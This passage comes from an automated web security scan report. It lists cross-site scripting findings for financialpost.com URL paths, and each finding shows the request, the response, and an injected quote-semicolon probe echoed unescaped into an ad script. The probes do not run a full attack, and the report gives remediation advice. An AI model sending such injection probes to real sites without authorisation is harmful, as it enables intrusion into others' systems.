The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60e8'%3bc423016c9ce was submitted in the REST URL parameter 4. This input was echoed as b60e8';c423016c9ce in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Retired+forgotten/3996666b60e8'%3bc423016c9ce/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63851
Expires: Sun, 19 Dec 2010 03:14:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/retired-forgotten/3996666b60e8';c423016c9ce/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=retired-forgotten;kw=3996666b60e8';c423016c9ce;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=
...[SNIP]...

1.219. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Retired+forgotten/3996666/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85984'%3b9b5aa3d4cb2 was submitted in the REST URL parameter 5. This input was echoed as 85984';9b5aa3d4cb2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Retired+forgotten/3996666/85984'%3b9b5aa3d4cb2 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37190


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/retired%20forgotten/3996666/85984';9b5aa3d4cb2/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=retired%20forgotten;kw=3996666;kw=85984';9b5aa3d4cb2;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag
...[SNIP]...

1.220. http://www.financialpost.com/opinion/columnists/barry-critchley.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/barry-critchley.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9914'%3b305cc1577f was submitted in the REST URL parameter 1. This input was echoed as a9914';305cc1577f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opiniona9914'%3b305cc1577f/columnists/barry-critchley.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44289


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opiniona9914';305cc1577f/columnists/barry-critchley;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opiniona9914';305cc1577f;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=37283901?">
...[SNIP]...

1.221. http://www.financialpost.com/opinion/columnists/barry-critchley.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/barry-critchley.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eacd7'%3bd88cefa4959 was submitted in the REST URL parameter 2. This input was echoed as eacd7';d88cefa4959 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnistseacd7'%3bd88cefa4959/barry-critchley.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37612


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnistseacd7';d88cefa4959/barry-critchley;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnistseacd7';d88cefa4959;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=90543144?">
...[SNIP]...

1.222. http://www.financialpost.com/opinion/columnists/barry-critchley.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/barry-critchley.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29f40'%3b40381cfea5e was submitted in the REST URL parameter 3. This input was echoed as 29f40';40381cfea5e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/29f40'%3b40381cfea5e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43401


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/29f40';40381cfea5e/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=29f40';40381cfea5e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=62189455?">
...[SNIP]...

1.223. http://www.financialpost.com/opinion/columnists/diane-francis.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/diane-francis.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4697c'%3b898f841844e was submitted in the REST URL parameter 1. This input was echoed as 4697c';898f841844e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion4697c'%3b898f841844e/columnists/diane-francis.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43472


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion4697c';898f841844e/columnists/diane-francis;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion4697c';898f841844e;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=81599666?">
...[SNIP]...

1.224. http://www.financialpost.com/opinion/columnists/diane-francis.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/diane-francis.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d524b'%3be3824be34be was submitted in the REST URL parameter 2. This input was echoed as d524b';e3824be34be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnistsd524b'%3be3824be34be/diane-francis.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43436


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnistsd524b';e3824be34be/diane-francis;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnistsd524b';e3824be34be;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=72279401?">
...[SNIP]...

1.225. http://www.financialpost.com/opinion/columnists/diane-francis.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/diane-francis.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c15cd'%3b24a7cbbec0f was submitted in the REST URL parameter 3. This input was echoed as c15cd';24a7cbbec0f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/c15cd'%3b24a7cbbec0f HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44221


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/c15cd';24a7cbbec0f/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=c15cd';24a7cbbec0f;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32681172?">
...[SNIP]...

1.226. http://www.financialpost.com/opinion/columnists/garry-marr.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/garry-marr.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 204b9'%3bda5ddd2e310 was submitted in the REST URL parameter 1. This input was echoed as 204b9';da5ddd2e310 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion204b9'%3bda5ddd2e310/columnists/garry-marr.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43441


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion204b9';da5ddd2e310/columnists/garry-marr;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion204b9';da5ddd2e310;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=14041721?">
...[SNIP]...

1.227. http://www.financialpost.com/opinion/columnists/garry-marr.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/garry-marr.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6548'%3b3159e915d61 was submitted in the REST URL parameter 2. This input was echoed as f6548';3159e915d61 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnistsf6548'%3b3159e915d61/garry-marr.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37562


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnistsf6548';3159e915d61/garry-marr;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnistsf6548';3159e915d61;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=12876194?">
...[SNIP]...

1.228. http://www.financialpost.com/opinion/columnists/garry-marr.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/garry-marr.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc04b'%3bdce0ac574b1 was submitted in the REST URL parameter 3. This input was echoed as cc04b';dce0ac574b1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/cc04b'%3bdce0ac574b1 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43402


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/cc04b';dce0ac574b1/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=cc04b';dce0ac574b1;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=73935194?">
...[SNIP]...

1.229. http://www.financialpost.com/opinion/columnists/jamie-golombek.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/jamie-golombek.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88d2f'%3b0c9133db820 was submitted in the REST URL parameter 1. This input was echoed as 88d2f';0c9133db820 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion88d2f'%3b0c9133db820/columnists/jamie-golombek.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37637


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion88d2f';0c9133db820/columnists/jamie-golombek;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion88d2f';0c9133db820;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=31471561?">
...[SNIP]...

1.230. http://www.financialpost.com/opinion/columnists/jamie-golombek.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/jamie-golombek.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ed13'%3b43d2ce6bccf was submitted in the REST URL parameter 2. This input was echoed as 4ed13';43d2ce6bccf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists4ed13'%3b43d2ce6bccf/jamie-golombek.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37601


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists4ed13';43d2ce6bccf/jamie-golombek;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists4ed13';43d2ce6bccf;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=44833350?">
...[SNIP]...

1.231. http://www.financialpost.com/opinion/columnists/jamie-golombek.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/jamie-golombek.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b393c'%3b95d66bbad15 was submitted in the REST URL parameter 3. This input was echoed as b393c';95d66bbad15 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/b393c'%3b95d66bbad15 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
